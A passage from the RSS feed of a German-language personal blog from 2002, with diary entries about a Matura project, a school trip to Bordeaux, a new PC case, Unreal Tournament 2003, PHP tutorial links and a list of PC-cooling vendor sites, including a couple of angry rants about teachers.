  15494.    <link>https://blog.x-way.org/Misc/2002/10/03/UT_20031.html</link>
  15495.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=98</guid>
  15496.    <dc:creator>Andreas Jaggi</dc:creator>
  15497.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15498.    <pubDate>Thu, 03 Oct 2002 23:49:00 +0000</pubDate>
  15499.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15500.    <description><![CDATA[Meins! Mit Tasche, T-Shirt und UT-Energy-Getränk.
  15501. ]]></description>
  15502.    <content:encoded><![CDATA[Meins! Mit Tasche, T-Shirt und UT-Energy-Getränk.
  15503. ]]></content:encoded>
  15504.  </item>
  15505.  
  15506.  <item>
  15507.    <title>Stress - Ferienbeginn</title>
  15508.    <link>https://blog.x-way.org/Misc/2002/09/30/Stress_-_Ferienbeginn.html</link>
  15509.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=97</guid>
  15510.    <dc:creator>Andreas Jaggi</dc:creator>
  15511.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15512.    <pubDate>Mon, 30 Sep 2002 11:52:00 +0000</pubDate>
  15513.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15514.    <description><![CDATA[Seit meinem letzten Eintrag ist einiges (für mich) wichtiges vonstatten gegangen, das ich euch nicht vorenthalten möchte.<br><br><b>Mittwoch, 18.9.</b><br>2 h Schlaf, wegen Maturaarbeit machen - ganzer Tag daran weitermachen.<br><br><b>Donnerstag, 19.9.</b><br>Nix Schlaf, wegen Maturaarbeit. Morgens um 7 endlich finale Version fertig ausgedruckt (Latein 7.30-9.05 muss ausfallen;). Danach Probe in Französisch, was ich am Morgen im Zug nur 1h gelernt hatte (Ja Frau N., es wird eine sauschlechte Note geben).<br>Elternabend. Geht voll in die Hose, weil "Schinkengipfeli" doch nicht Mikrowellentauglich sind und die Eltern infolge der schlechten Vorbereitung null Informationen bekommen. Nutzen = 0.<br><br><b>Freitag, 20.9.</b><br>Normaler Schultag. Schlafe andauernd fast ein (Weshalb wohl? ;-).<br>Am Abend spontaner Entscheid zum Besuch eines Konzerts "Closed Air" in meinem Dorf (Kaff). <a href="https://web.archive.org/web/20020926060502/http://www.chickennuggets.ch/" target="_blank"><b>Chickennuggets</b></a> (schlecht) und <a href="http://www.openseason.ch"><b>Openseason</b></a> (gut) spielen. Die Qualität der Bands ist vergleichbar mit der Qualität der entsprechenden Websites.<br><br><b>Samstag, 21.9.</b><br>Um 3 zurück von konzert und ab ins Bett bis 13 Uhr. Am Nachmittag Chillout betreiben.<br>Wieder ein spontaner Entscheid zum Partymachen bei Ramon. Also, in nächsten Zug gesetzt und ab nach Steffisburg (1.5 h). Im Verlauf des Abends sind wir auf <a href="https://www.youtube.com/watch?v=Eq2PQm6FqVY" target="_blank" title="Growl Karaoke auf YouTube"><b>dieses "Growl-Karaoke"</b></a> gestossen.<br><br><b>Sonntag, 22.9.</b><br>4 Uhr in Steffisburg einschlafen und um 10 wieder auf und zurück nach Hause (12.00). Packen für Projektwoche Bordeaux.<br>Um 18 Uhr knapp den Zug nicht verpassen. Zusammentreffen mit den anderen unterwegs. Grenzüberschreitung in Genf; umsteigen in Schlafwagen. "Couchette" nennt sich das und ist saueng. Dementsprechend langer Aufenthalt im Gang und kurzer Schlaf. Wobei von erholsamem Schlaf keine Rede ist: dauernd wird man in irgendeine Richtung geschubst und stösst an die Wand, Decke etc.<br><br><b>Montag, 23.9.</b><br>5.15 Uhr Wecken im Couchette. Danach Umsteigen in Toulouse in einen normaleren Zug, mit verstellbaren Sitzen, die so kurze Kopfstützen haben, dass sich jeder die Wirbelsäule verbiegen muss, um einigermassen bequem liegen zu können. So um 8 Uhr Ankunft in <a href="http://www.bordeaux-tourisme.com/"><b>Bordeaux</b></a>; total verspannt, verkatert, verrenkt ...
  15515. ]]></description>
  15516.    <content:encoded><![CDATA[Seit meinem letzten Eintrag ist einiges (für mich) wichtiges vonstatten gegangen, das ich euch nicht vorenthalten möchte.<br><br><b>Mittwoch, 18.9.</b><br>2 h Schlaf, wegen Maturaarbeit machen - ganzer Tag daran weitermachen.<br><br><b>Donnerstag, 19.9.</b><br>Nix Schlaf, wegen Maturaarbeit. Morgens um 7 endlich finale Version fertig ausgedruckt (Latein 7.30-9.05 muss ausfallen;). Danach Probe in Französisch, was ich am Morgen im Zug nur 1h gelernt hatte (Ja Frau N., es wird eine sauschlechte Note geben).<br>Elternabend. Geht voll in die Hose, weil "Schinkengipfeli" doch nicht Mikrowellentauglich sind und die Eltern infolge der schlechten Vorbereitung null Informationen bekommen. Nutzen = 0.<br><br><b>Freitag, 20.9.</b><br>Normaler Schultag. Schlafe andauernd fast ein (Weshalb wohl? ;-).<br>Am Abend spontaner Entscheid zum Besuch eines Konzerts "Closed Air" in meinem Dorf (Kaff). <a href="https://web.archive.org/web/20020926060502/http://www.chickennuggets.ch/" target="_blank"><b>Chickennuggets</b></a> (schlecht) und <a href="http://www.openseason.ch"><b>Openseason</b></a> (gut) spielen. Die Qualität der Bands ist vergleichbar mit der Qualität der entsprechenden Websites.<br><br><b>Samstag, 21.9.</b><br>Um 3 zurück von konzert und ab ins Bett bis 13 Uhr. Am Nachmittag Chillout betreiben.<br>Wieder ein spontaner Entscheid zum Partymachen bei Ramon. Also, in nächsten Zug gesetzt und ab nach Steffisburg (1.5 h). Im Verlauf des Abends sind wir auf <a href="https://www.youtube.com/watch?v=Eq2PQm6FqVY" target="_blank" title="Growl Karaoke auf YouTube"><b>dieses "Growl-Karaoke"</b></a> gestossen.<br><br><b>Sonntag, 22.9.</b><br>4 Uhr in Steffisburg einschlafen und um 10 wieder auf und zurück nach Hause (12.00). Packen für Projektwoche Bordeaux.<br>Um 18 Uhr knapp den Zug nicht verpassen. Zusammentreffen mit den anderen unterwegs. Grenzüberschreitung in Genf; umsteigen in Schlafwagen. "Couchette" nennt sich das und ist saueng. Dementsprechend langer Aufenthalt im Gang und kurzer Schlaf. Wobei von erholsamem Schlaf keine Rede ist: dauernd wird man in irgendeine Richtung geschubst und stösst an die Wand, Decke etc.<br><br><b>Montag, 23.9.</b><br>5.15 Uhr Wecken im Couchette. Danach Umsteigen in Toulouse in einen normaleren Zug, mit verstellbaren Sitzen, die so kurze Kopfstützen haben, dass sich jeder die Wirbelsäule verbiegen muss, um einigermassen bequem liegen zu können. So um 8 Uhr Ankunft in <a href="http://www.bordeaux-tourisme.com/"><b>Bordeaux</b></a>; total verspannt, verkatert, verrenkt ...
  15517. ]]></content:encoded>
  15518.  </item>
  15519.  
  15520.  <item>
  15521.    <title>Ahh... Ohh... Uhh...</title>
  15522.    <link>https://blog.x-way.org/Tech/2002/09/17/Ahh_Ohh_Uhh.html</link>
  15523.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=96</guid>
  15524.    <dc:creator>Andreas Jaggi</dc:creator>
  15525.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15526.    <pubDate>Tue, 17 Sep 2002 21:11:00 +0000</pubDate>
  15527.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  15528.    <description><![CDATA[Heute ist mein neues Gehäuse angekommen.<br><br><img src="https://blog.x-way.org/images/avance-case.jpg" alt="Avance Midi Tower B031-TI Titan"><br><br>Bestellt bei <a href="http://www.listan.de/" target="_blank"><b>listan.de</b></a> konnte ich von den europöischen 16% Mwst. 8.4 % einsparen und musste nur die 7.6 % CH-Mwst. zahlen. Einkaufen in anderen Ländern lohnt sich also :-)<br>Zum Gehäuse kann ich nur sagen: <b>Erste Sahne !!!</b><br>Im Tageslicht sieht es aus wie aus Spiegeln gemacht, im Dunkeln - unterm Tisch - ist es schwarz wie die Nacht.<br>Der Computer ist hörbar leiser, obwohl 2 zusätzliche Lüfter hinzugekommen sind! Liegt vermutlich am neuen Netzteil. Ein/Umbau ging problemlos vonstatten. Gestern habe ich (endlich) eine neue Festplatte bestellt. Eine Samsung SpinPoint P40 - 80 GB. Wurde auch langsam Zeit, da <a href="http://waterwave.ch/weblog/detail.php?id=77"><b>solches</b></a> passiert war. Habe mich dann heute schön erschrocken, als ich <a href="http://www.heise.de/newsticker/data/lab-16.09.02-000/" target="_blank"><b>diesen Artikel</b></a> entdeckte. Konnte mich dann aber beruhigen, weil da Samsung nicht mitzieht und immernoch 3 Jahre Garantie bietet. Schlechter ists da dem <a href="https://web.archive.org/web/20030412152010/http://monoklon.de/archiv/2002/09/"><b>Michael</b></a> ergangen.
  15529. ]]></description>
  15530.    <content:encoded><![CDATA[Heute ist mein neues Gehäuse angekommen.<br><br><img src="https://blog.x-way.org/images/avance-case.jpg" alt="Avance Midi Tower B031-TI Titan"><br><br>Bestellt bei <a href="http://www.listan.de/" target="_blank"><b>listan.de</b></a> konnte ich von den europöischen 16% Mwst. 8.4 % einsparen und musste nur die 7.6 % CH-Mwst. zahlen. Einkaufen in anderen Ländern lohnt sich also :-)<br>Zum Gehäuse kann ich nur sagen: <b>Erste Sahne !!!</b><br>Im Tageslicht sieht es aus wie aus Spiegeln gemacht, im Dunkeln - unterm Tisch - ist es schwarz wie die Nacht.<br>Der Computer ist hörbar leiser, obwohl 2 zusätzliche Lüfter hinzugekommen sind! Liegt vermutlich am neuen Netzteil. Ein/Umbau ging problemlos vonstatten. Gestern habe ich (endlich) eine neue Festplatte bestellt. Eine Samsung SpinPoint P40 - 80 GB. Wurde auch langsam Zeit, da <a href="http://waterwave.ch/weblog/detail.php?id=77"><b>solches</b></a> passiert war. Habe mich dann heute schön erschrocken, als ich <a href="http://www.heise.de/newsticker/data/lab-16.09.02-000/" target="_blank"><b>diesen Artikel</b></a> entdeckte. Konnte mich dann aber beruhigen, weil da Samsung nicht mitzieht und immernoch 3 Jahre Garantie bietet. Schlechter ists da dem <a href="https://web.archive.org/web/20030412152010/http://monoklon.de/archiv/2002/09/"><b>Michael</b></a> ergangen.
  15531. ]]></content:encoded>
  15532.  </item>
  15533.  
  15534.  <item>
  15535.    <title>5 ... 4 ... 3 ... 2 ... 1 ... Tada!</title>
  15536.    <link>https://blog.x-way.org/School/2002/09/17/5__4__3__2__1__Tada.html</link>
  15537.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=95</guid>
  15538.    <dc:creator>Andreas Jaggi</dc:creator>
  15539.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15540.    <pubDate>Tue, 17 Sep 2002 02:57:00 +0000</pubDate>
  15541.    <category domain="https://blog.x-way.org/School">School</category>
  15542.    <description><![CDATA[<a href="https://web.archive.org/web/20030719065955/http://www.waterwave.ch/maturaarbeit/"><b>Hier</b></a> ist nun die Praxisarbeit meiner Maturaarbeit - eine Website. Genauer gesagt ist dort vorerst nur das Design. Wer den Inhalt will, bitte <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch" target="_blank"><b>hier</b></a> schauen.<br>Die Website entstand/entsteht zum Thema Usability.<br>Daher bitte Verbesserungsvorschläge abgeben!
  15543. ]]></description>
  15544.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20030719065955/http://www.waterwave.ch/maturaarbeit/"><b>Hier</b></a> ist nun die Praxisarbeit meiner Maturaarbeit - eine Website. Genauer gesagt ist dort vorerst nur das Design. Wer den Inhalt will, bitte <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch" target="_blank"><b>hier</b></a> schauen.<br>Die Website entstand/entsteht zum Thema Usability.<br>Daher bitte Verbesserungsvorschläge abgeben!
  15545. ]]></content:encoded>
  15546.  </item>
  15547.  
  15548.  <item>
  15549.    <title>dHd - PHP</title>
  15550.    <link>https://blog.x-way.org/Coding/2002/09/15/dHd_-_PHP.html</link>
  15551.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=94</guid>
  15552.    <dc:creator>Andreas Jaggi</dc:creator>
  15553.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15554.    <pubDate>Sun, 15 Sep 2002 23:20:00 +0000</pubDate>
  15555.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  15556.    <description><![CDATA[<a href="https://web.archive.org/web/20020919132941/http://www.zend.com/zend/tut/tutorial-campbell.php" target="_blank"><b>Hier</b></a> sieht das mit PHP und SOAP so einfach aus, dass sogar ich ein bisschen drausgekommen bin. Bei Gelegenheit (wenn Maturaarbeit feritg) ausdrucken.<br><br>Und das <a href="https://web.archive.org/web/20020917061831/http://www.onlamp.com/pub/a/php/2002/09/12/php_foundations.html" target="_blank"><b>hier</b></a> sieht auch sehr interessant aus.<br><br>Beides geklaut vom <a href="http://schockwellenreiter.de/" target="_blank"><b>Schockwellenreiter</b></a>.
  15557. ]]></description>
  15558.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20020919132941/http://www.zend.com/zend/tut/tutorial-campbell.php" target="_blank"><b>Hier</b></a> sieht das mit PHP und SOAP so einfach aus, dass sogar ich ein bisschen drausgekommen bin. Bei Gelegenheit (wenn Maturaarbeit feritg) ausdrucken.<br><br>Und das <a href="https://web.archive.org/web/20020917061831/http://www.onlamp.com/pub/a/php/2002/09/12/php_foundations.html" target="_blank"><b>hier</b></a> sieht auch sehr interessant aus.<br><br>Beides geklaut vom <a href="http://schockwellenreiter.de/" target="_blank"><b>Schockwellenreiter</b></a>.
  15559. ]]></content:encoded>
  15560.  </item>
  15561.  
  15562.  <item>
  15563.    <title>ut2003</title>
  15564.    <link>https://blog.x-way.org/Linux/2002/09/15/ut2003.html</link>
  15565.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=93</guid>
  15566.    <dc:creator>Andreas Jaggi</dc:creator>
  15567.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15568.    <pubDate>Sun, 15 Sep 2002 02:42:00 +0000</pubDate>
  15569.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  15570.    <description><![CDATA[sehr schön finde ich, dass es ut 2003 auch für linux gibt. muss ich mal ausprobieren. vermutlich werde ich es aber nicht zum laufen kriegen ;-)<br><br>Unter Windows:<br>
  15571. ut2003.ini<br><br>
  15572. Language=det - grünes blut
  15573. <br>Language=eng - rotes blut
  15574. <br><br>;-)
  15575. ]]></description>
  15576.    <content:encoded><![CDATA[sehr schön finde ich, dass es ut 2003 auch für linux gibt. muss ich mal ausprobieren. vermutlich werde ich es aber nicht zum laufen kriegen ;-)<br><br>Unter Windows:<br>
  15577. ut2003.ini<br><br>
  15578. Language=det - grünes blut
  15579. <br>Language=eng - rotes blut
  15580. <br><br>;-)
  15581. ]]></content:encoded>
  15582.  </item>
  15583.  
  15584.  <item>
  15585.    <title>Feiger gehts nicht mehr ...</title>
  15586.    <link>https://blog.x-way.org/School/2002/09/14/Feiger_gehts_nicht_mehr_.html</link>
  15587.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=92</guid>
  15588.    <dc:creator>Andreas Jaggi</dc:creator>
  15589.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15590.    <pubDate>Sat, 14 Sep 2002 18:50:00 +0000</pubDate>
  15591.    <category domain="https://blog.x-way.org/School">School</category>
  15592.    <description><![CDATA[Wird eine gewisse feige Person auf eine von ihr erfolgte schriftliche (da zu feige um mündlich etwas zu kritisieren) Reklamation angesprochen so heisst es, dass mit der schriftlichen Reklamation nicht jeder der Gruppe gemeint gewesen sei und dass man persönlich sich davon ausschliessen könne.<br>Wird jene feige Person aber von jemandem anderen der Gruppe auf die schriftliche Reklamation angesprochen, so erfolgt wieder die gleiche Antwort (nicht jeder gemeint, sich persoenlich davon ausnehmen etc.) und zusätzlich wird argumentiert, dass beispielsweise die Person (welche vorher mit der feigen Person gesprochen hatte und sich von der schriftlichen Reklamation ausnehmen könne) ihre Aufgaben nicht gemacht habe und diese mit der schriftlichen Reklamation gemeint sei!!!!<br>So geschehen an <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch"><b>diesem Gymnasium</b></a>!<br><br>Herr ?? sie sind ein verdammtes Arschloch!<br>[Hier die schlimmstmöglichen Flüche, Beschimpfungen etc. einfügen und x mal wiederholen!]
  15593. ]]></description>
  15594.    <content:encoded><![CDATA[Wird eine gewisse feige Person auf eine von ihr erfolgte schriftliche (da zu feige um mündlich etwas zu kritisieren) Reklamation angesprochen so heisst es, dass mit der schriftlichen Reklamation nicht jeder der Gruppe gemeint gewesen sei und dass man persönlich sich davon ausschliessen könne.<br>Wird jene feige Person aber von jemandem anderen der Gruppe auf die schriftliche Reklamation angesprochen, so erfolgt wieder die gleiche Antwort (nicht jeder gemeint, sich persoenlich davon ausnehmen etc.) und zusätzlich wird argumentiert, dass beispielsweise die Person (welche vorher mit der feigen Person gesprochen hatte und sich von der schriftlichen Reklamation ausnehmen könne) ihre Aufgaben nicht gemacht habe und diese mit der schriftlichen Reklamation gemeint sei!!!!<br>So geschehen an <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch"><b>diesem Gymnasium</b></a>!<br><br>Herr ?? sie sind ein verdammtes Arschloch!<br>[Hier die schlimmstmöglichen Flüche, Beschimpfungen etc. einfügen und x mal wiederholen!]
  15595. ]]></content:encoded>
  15596.  </item>
  15597.  
  15598.  <item>
  15599.    <title>UT 2003</title>
  15600.    <link>https://blog.x-way.org/Misc/2002/09/14/UT_2003.html</link>
  15601.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=91</guid>
  15602.    <dc:creator>Andreas Jaggi</dc:creator>
  15603.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15604.    <pubDate>Sat, 14 Sep 2002 18:17:00 +0000</pubDate>
  15605.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15606.    <description><![CDATA[Verschlafen wie ich bin, habe ich erst jetzt bemerkt, dass seit heute Morgen eine (offizielle ;-) Demo von UT 2003 im Netz ist. Hoffentlich erscheint nun auch bald die Vollversion. Habe schon genug lange gewartet.
  15607. ]]></description>
  15608.    <content:encoded><![CDATA[Verschlafen wie ich bin, habe ich erst jetzt bemerkt, dass seit heute Morgen eine (offizielle ;-) Demo von UT 2003 im Netz ist. Hoffentlich erscheint nun auch bald die Vollversion. Habe schon genug lange gewartet.
  15609. ]]></content:encoded>
  15610.  </item>
  15611.  
  15612.  <item>
  15613.    <title>Kindergarten</title>
  15614.    <link>https://blog.x-way.org/School/2002/09/09/Kindergarten.html</link>
  15615.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=90</guid>
  15616.    <dc:creator>Andreas Jaggi</dc:creator>
  15617.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15618.    <pubDate>Mon, 09 Sep 2002 21:53:00 +0000</pubDate>
  15619.    <category domain="https://blog.x-way.org/School">School</category>
  15620.    <description><![CDATA[<a href="https://blog.x-way.org/images/ko.gif"><b>So</b></a> kommt es, wenn Lehrer Kindergarten spielen.<br>Das Schönste daran ist jedoch, dass mir der Herr KO am besagten Freitag selbst versichert hat, dass es genügt, wenn ich ihm eine nachbearbeitete Version des Stadtplans von Bordeaux als Kopiervorlage abgebe. Aus dem Gespräch ist ganz klar (und mit beidseitiger Zustimmung) herausgegangen, dass ich diese Vorlage <b>nicht</b> am Freitag schon abgeben muss!<br><br>Es ist leider bedauerlich, dass gewisse Lehrpersonen nicht fähig sind einem mündlich etwas mitzuteilen und stattdessen ihre Unstimmigkeit nur <b>ganz feige und unfair</b> schriftlich mitteilen können.<br>Es gibt gewisse Lehrpersonen an <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch"><b>diesem Gymnasium</b></a> die IMHO inkompetent und verdammt feige sind! [Hier ein besonders böses Schimpfwort einfügen]!
  15621. ]]></description>
  15622.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/ko.gif"><b>So</b></a> kommt es, wenn Lehrer Kindergarten spielen.<br>Das Schönste daran ist jedoch, dass mir der Herr KO am besagten Freitag selbst versichert hat, dass es genügt, wenn ich ihm eine nachbearbeitete Version des Stadtplans von Bordeaux als Kopiervorlage abgebe. Aus dem Gespräch ist ganz klar (und mit beidseitiger Zustimmung) herausgegangen, dass ich diese Vorlage <b>nicht</b> am Freitag schon abgeben muss!<br><br>Es ist leider bedauerlich, dass gewisse Lehrpersonen nicht fähig sind einem mündlich etwas mitzuteilen und stattdessen ihre Unstimmigkeit nur <b>ganz feige und unfair</b> schriftlich mitteilen können.<br>Es gibt gewisse Lehrpersonen an <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch"><b>diesem Gymnasium</b></a> die IMHO inkompetent und verdammt feige sind! [Hier ein besonders böses Schimpfwort einfügen]!
  15623. ]]></content:encoded>
  15624.  </item>
  15625.  
  15626.  <item>
  15627.    <title>What revolution Are You?</title>
  15628.    <link>https://blog.x-way.org/Misc/2002/09/07/What_revolution_Are_You.html</link>
  15629.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=89</guid>
  15630.    <dc:creator>Andreas Jaggi</dc:creator>
  15631.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15632.    <pubDate>Sat, 07 Sep 2002 00:52:00 +0000</pubDate>
  15633.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15634.    <description><![CDATA[<br><img src="https://blog.x-way.org/images/rev05.jpg" width="340" height="180" alt="computer revolution"><br><br><a href="https://web.archive.org/web/20020913063841/http://www.verfall.net/quizz/revol/" target="_blank"><b>What revolution Are You?</b></a><br>Gefunden bei <a href="https://web.archive.org/web/20021004051645/http://www.monoklon.de/index.php"><b>monoklon.de</b></a>
  15635. ]]></description>
  15636.    <content:encoded><![CDATA[<br><img src="https://blog.x-way.org/images/rev05.jpg" width="340" height="180" alt="computer revolution"><br><br><a href="https://web.archive.org/web/20020913063841/http://www.verfall.net/quizz/revol/" target="_blank"><b>What revolution Are You?</b></a><br>Gefunden bei <a href="https://web.archive.org/web/20021004051645/http://www.monoklon.de/index.php"><b>monoklon.de</b></a>
  15637. ]]></content:encoded>
  15638.  </item>
  15639.  
  15640.  <item>
  15641.    <title>phptutorial</title>
  15642.    <link>https://blog.x-way.org/Coding/2002/09/07/phptutorial.html</link>
  15643.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=88</guid>
  15644.    <dc:creator>Andreas Jaggi</dc:creator>
  15645.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15646.    <pubDate>Sat, 07 Sep 2002 00:39:00 +0000</pubDate>
  15647.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  15648.    <description><![CDATA[Beim durchsurfen der <a href="http://waterwave.ch/weblog/logout.php" target="_blank">Referrer</a> ist mir in einem Googlequery <a href="https://web.archive.org/web/20020808074738/http://www.usegroup.de/software/phptutorial/index.html" target="_blank"><b>dieses Tutorial/Artikel über PHP</b></a> ins Auge gestochen. Eine IMHO gute Erklärung für Neueinstieger/Umsteiger.
  15649. ]]></description>
  15650.    <content:encoded><![CDATA[Beim durchsurfen der <a href="http://waterwave.ch/weblog/logout.php" target="_blank">Referrer</a> ist mir in einem Googlequery <a href="https://web.archive.org/web/20020808074738/http://www.usegroup.de/software/phptutorial/index.html" target="_blank"><b>dieses Tutorial/Artikel über PHP</b></a> ins Auge gestochen. Eine IMHO gute Erklärung für Neueinstieger/Umsteiger.
  15651. ]]></content:encoded>
  15652.  </item>
  15653.  
  15654.  <item>
  15655.    <title>PH(P)un</title>
  15656.    <link>https://blog.x-way.org/Coding/2002/09/06/PHPun.html</link>
  15657.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=87</guid>
  15658.    <dc:creator>Andreas Jaggi</dc:creator>
  15659.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15660.    <pubDate>Fri, 06 Sep 2002 12:14:00 +0000</pubDate>
  15661.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  15662.    <description><![CDATA[Via einem Link beim <a href="http://www.schockwellenreiter.de" target="_blank"><b>Schockwellenreiter</b></a> bin ich auf <a href="http://www.alistapart.com/stories/succeed/" target="_blank"><b>diesen Artikel</b></a> gestossen, welcher eine virtuelle Umwandlung von statischen in dynamische URLs beschreibt. Mit mod_rewrite!<br>Muss ich irgendwann einbauen, wann ich weniger Stress mit der Maturaarbeit habe. :-)
  15663. ]]></description>
  15664.    <content:encoded><![CDATA[Via einem Link beim <a href="http://www.schockwellenreiter.de" target="_blank"><b>Schockwellenreiter</b></a> bin ich auf <a href="http://www.alistapart.com/stories/succeed/" target="_blank"><b>diesen Artikel</b></a> gestossen, welcher eine virtuelle Umwandlung von statischen in dynamische URLs beschreibt. Mit mod_rewrite!<br>Muss ich irgendwann einbauen, wann ich weniger Stress mit der Maturaarbeit habe. :-)
  15665. ]]></content:encoded>
  15666.  </item>
  15667.  
  15668.  <item>
  15669.    <title>Damit man einmal weniger klicken muss</title>
  15670.    <link>https://blog.x-way.org/Tech/2002/09/05/Damit_man_einmal_weniger_klicken_muss.html</link>
  15671.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=86</guid>
  15672.    <dc:creator>Andreas Jaggi</dc:creator>
  15673.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15674.    <pubDate>Thu, 05 Sep 2002 20:02:00 +0000</pubDate>
  15675.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  15676.    <description><![CDATA[Da bei c't nicht direkt auf den entsprechenden Abschnitt gelinkt werden kann und ich die URLs noch länger aufheben will als bis zur nächsten c't Ausgabe, habe ich sie nun stinkfrech direkt aus dem Quelltext herauskopiert. :-)<br><br><a href="https://web.archive.org/web/20020905200200/http://www.carsten-buschmann.de/schallschutz/">http://www.carsten-buschmann.de/schallschutz/</a><br>
  15677. <a href="https://web.archive.org/web/20020905200200/http://12ghosts.com/de/silence/">http://12ghosts.com/de/silence/</a><br>
  15678. <a href="https://web.archive.org/web/20020905200200/http://haiko.de/kiste/">http://haiko.de/kiste/</a><br>
  15679. <a href="https://web.archive.org/web/20020905200200/http://www.noisecontrol.de">http://www.noisecontrol.de</a><br>
  15680. <a href="https://web.archive.org/web/20020905200200/http://www.alternate.de">http://www.alternate.de</a><br>
  15681. <a href="https://web.archive.org/web/20020905200200/http://www.aqua-computer.de">http://www.aqua-computer.de</a><br>
  15682. <a href="https://web.archive.org/web/20020905200200/http://www.avitos.de">http://www.avitos.de</a><br>
  15683. <a href="https://web.archive.org/web/20020905200200/http://www.blacknoise.com">http://www.blacknoise.com</a><br>
  15684. <a href="https://web.archive.org/web/20020905200200/http://www.chip-cooler.de">http://www.chip-cooler.de</a><br>
  15685. <a href="https://web.archive.org/web/20020905200200/http://www.comptronic.de">http://www.comptronic.de</a><br>
  15686. <a href="https://web.archive.org/web/20020905200200/http://www.extremcooling.de">http://www.extremcooling.de</a><br>
  15687. <a href="https://web.archive.org/web/20020905200200/http://www.frozen-silicon.de">http://www.frozen-silicon.de</a><br>
  15688. <a href="https://web.archive.org/web/20020905200200/http://www.pcsilent.de">http://www.pcsilent.de</a><br>
  15689. <a href="https://web.archive.org/web/20020905200200/http://www.hrt.de">http://www.hrt.de</a><br>
  15690. <a href="https://web.archive.org/web/20020905200200/http://www.intos.de">http://www.intos.de</a><br>
  15691. <a href="https://web.archive.org/web/20020905200200/http://www.lindenberger.de">http://www.lindenberger.de</a><br>
  15692. <a href="https://web.archive.org/web/20020905200200/http://www.listan.de">http://www.listan.de</a><br>
  15693. <a href="https://web.archive.org/web/20020905200200/http://www.madex.de">http://www.madex.de</a><br>
  15694. <a href="https://web.archive.org/web/20020905200200/http://www.maxbyte.de">http://www.maxbyte.de</a><br>
  15695. <a href="https://web.archive.org/web/20020905200200/http://www.oc-card.de">http://www.oc-card.de</a><br>
  15696. <a href="https://web.archive.org/web/20020905200200/http://www.overclockers.de">http://www.overclockers.de</a><br>
  15697. <a href="https://web.archive.org/web/20020905200200/http://www.pc-cooling.de">http://www.pc-cooling.de</a><br>
  15698. <a href="https://web.archive.org/web/20020905200200/http://www.smartcooler.de">http://www.smartcooler.de</a><br>
  15699. <a href="https://web.archive.org/web/20020905200200/http://www.watercool.de">http://www.watercool.de</a><br>
  15700. <a href="https://web.archive.org/web/20020905200200/http://www.watercooling.de">http://www.watercooling.de</a><br>
  15701. <a href="https://web.archive.org/web/20020905200200/http://www.multimediashop.de">http://www.multimediashop.de</a><br>
  15702. <a href="https://web.archive.org/web/20020905200200/http://www.matrox.com">http://www.matrox.com</a><br>
  15703. <a href="https://web.archive.org/web/20020905200200/http://www.videologic.de">http://www.videologic.de</a><br>
  15704. <a href="https://web.archive.org/web/20020905200200/http://www.elitegroup.de">http://www.elitegroup.de</a><br>
  15705. <a href="https://web.archive.org/web/20020905200200/http://www.gainward.de">http://www.gainward.de</a><br>
  15706. <a href="https://web.archive.org/web/20020905200200/http://www.cptech.com.tw">http://www.cptech.com.tw</a><br>
  15707. <a href="https://web.archive.org/web/20020905200200/http://www.connect3d.com">http://www.connect3d.com</a><br>
  15708. <a href="https://web.archive.org/web/20020905200200/http://www.pny.de">http://www.pny.de</a><br>
  15709. <a href="https://web.archive.org/web/20020905200200/http://www.sparkle.com.tw">http://www.sparkle.com.tw</a><br>
  15710. <a href="https://web.archive.org/web/20020905200200/http://www.maxtor.com">http://www.maxtor.com</a><br>
  15711. <a href="https://web.archive.org/web/20020905200200/http://www.samsung.de">http://www.samsung.de</a><br>
